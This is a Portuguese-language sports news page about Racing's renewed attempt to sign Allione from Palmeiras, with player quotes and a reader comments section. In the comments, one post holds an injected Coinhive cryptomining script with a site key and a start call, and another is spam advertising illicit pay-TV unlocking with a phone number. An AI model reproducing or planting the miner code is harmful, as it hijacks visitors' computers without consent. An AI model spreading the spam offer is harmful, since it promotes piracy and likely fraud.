Racing volta à carga para tentar tirar Allione do Palmeiras

15/1/2018 11:18

Racing volta à carga para tentar tirar Allione do Palmeiras

Racing volta à carga para tentar tirar Allione do Palmeiras

Allione descansa durante treino do Palmeiras, na Academia de Futebol Gazeta Press



O Racing, da Argentina, voltou à carga para tentar tirar o meia-atacante Allione do Palmeiras.



Após iniciar conversas e praticamente desistir do atleta de 23 anos, o clube azul e branco retomou o interesse no último final de semana a pedido do técnico Eduardo Coudet, que faz questão de contar com o ex-Vélez Sarsfield como reforço.







O clube alviverde, porém, garante ainda não ter recebido proposta pelo jogador, segundo informações de Mauro Cezar Pereira, comentarista dos canais ESPN e blogueiro do ESPN.com.br.



Allione retornou ao Palmeiras nesta temporada após passar 2017 emprestado ao Bahia. Apesar do treinador Roger Machado ter pedido sua volta, ele não deve ter muitas chances de jogar ao longo do ano.



No momento, ele está atrás de Dudu, Keno e Willian na luta por uma vaga na linha de frente alviverde. Em jogo-treino realizado no último final de semana, o gringo entrou apenas no 3º tempo da vitória por 1 a 0 sobre o Atibaia, na Academia de Futebol.



Segundo o jornal Olé, o clube do Palestra Itália pediria US$ 2,5 milhões (R$ 8 milhões) para negociar o atleta em definitivo - em 2014, pagou um valor semelhante para tirá-lo do Vélez.



No entanto, o Racing trabalha com a possibilidade de um empréstimo. Coudet, inclusive, teria conversado por telefone com o jovem atleta e lhe explicado como planeja escalá-lo em La Academia: em uma linha de três no meio-campo.



Em coletiva recente, Allione confirmou que vinha sendo procurado pela equipe argentina, mas disse estar "com a cabeça" no Brasil.



"Acho que a saudade da família (que mora na Argentina) sempre vai existir. Mas estou bem aqui e feliz. Meu empresário me falou do Racing, mas no primeiro momento deixei claro que ele que deveria resolver isso. Depois ele comentou da proposta, mas estou com a cabeça aqui no Palmeiras, estou feliz aqui”, disse o camisa 17, que colocou o "fator Roger Machado" na balança.



“Para mim foi importante o treinador pedir minha volta, então estou trabalhando, esperando uma chance. Quando eu tiver, vou tentar aproveitar e tentar ter a sequência. Eu acho que amadureci muito, estou totalmente adaptado já, e também aprendi com cada treinador que passei. Hoje estou mais preparado do que em 2014, quando cheguei”, completou.



VEJA TAMBÉM
- Rony marca gol após jejum de 11 jogos pelo Palmeiras contra Botafogo-SP.
- Abel solicita permanência de Estêvão no clube até 2027: impressões surpreendentes.
- CbF divulga áudio do VAR em decisão de gol anulado do Palmeiras.





9873 visitas - Fonte: ESPN

Mais notícias do Palmeiras

Notícias de contratações do Palmeiras
Notícias mais lidas

O negócio é q o caras querem é por empréstimo, aí o verdão não ganha nada!

Nada de empréstimo quer paga

vende traz scarpa Miranda e Ricardo Goulart já que vendeú o mina

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

nem vem q nao tem < src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou .

Últimas notícias

publicidade
publicidade

Brasileiro

Qua - 20:00 - Arena Barueri -
X
Palmeiras
Internacional

Brasileiro

Dom - 18:30 - Manoel Barradas
0 X 1
Vitoria
Palmeiras